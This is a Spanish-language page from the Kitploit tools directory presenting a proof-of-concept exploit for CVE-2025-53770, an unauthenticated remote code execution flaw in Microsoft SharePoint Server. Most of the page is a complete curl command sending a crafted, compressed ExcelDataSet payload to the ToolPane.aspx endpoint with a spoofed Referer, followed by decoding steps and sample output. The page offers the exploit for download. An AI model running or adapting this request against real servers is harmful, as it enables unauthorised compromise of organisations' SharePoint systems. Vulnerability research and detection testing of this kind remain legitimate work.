Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-53770 — Exploit de prueba de concepto para ejecución remota de código no autenticada mediante deserialización insegura en Microsoft SharePoint Server (CVE-2025-53770), con comandos de extracción y decodificación de payload. | Kitploit
Herramientas/GitHubGitHub/0xray5c68616e37/cve-2025-53770
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHub0xray5c68616e37/cve-2025-53770

cve-2025-53770

Exploit de prueba de concepto para ejecución remota de código no autenticada mediante deserialización insegura en Microsoft SharePoint Server (CVE-2025-53770), con comandos de extracción y decodificación de payload.

Ver RepositorioSitio web
31hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-53770 PoC de RCE por Deserialización en SharePoint

Crítico — Ejecución Remota de Código no autenticada mediante deserialización insegura en Microsoft SharePoint Server (CVE-2025-53770)

Descripción

La deserialización de datos no confiables en Microsoft SharePoint Server local permite a un atacante ejecutar código de forma remota y comprometer el sistema. Microsoft está al tanto de la explotación activa y está preparando una actualización integral. Asegúrese de que las mitigaciones de la documentación de CVE estén implementadas.

  • Impacto: Los atacantes no autenticados pueden lograr la ejecución remota de código, lo que lleva al compromiso total del sistema.
  • Gravedad: Crítico

Prueba de Concepto

El siguiente PoC demuestra cómo un atacante puede explotar la vulnerabilidad para extraer y decodificar cargas maliciosas a través del endpoint vulnerable.

El dominio objetivo ha sido reemplazado intencionalmente por reeaccated.com.

Comando

root@kitploit:~
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

Salida

root@kitploit:~
<Info>IntruderScannerDetectionPayload</Info>
imagen

Referencias

  • Implementación de carga de prueba
  • Análisis de seguridad de Code White
  • Guía de Microsoft
  • Entrada de NVD

Impacto:
Los atacantes no autenticados pueden explotar la deserialización insegura para lograr la ejecución remota de código en SharePoint Server, lo que lleva al compromiso total del sistema.

Descargar herramienta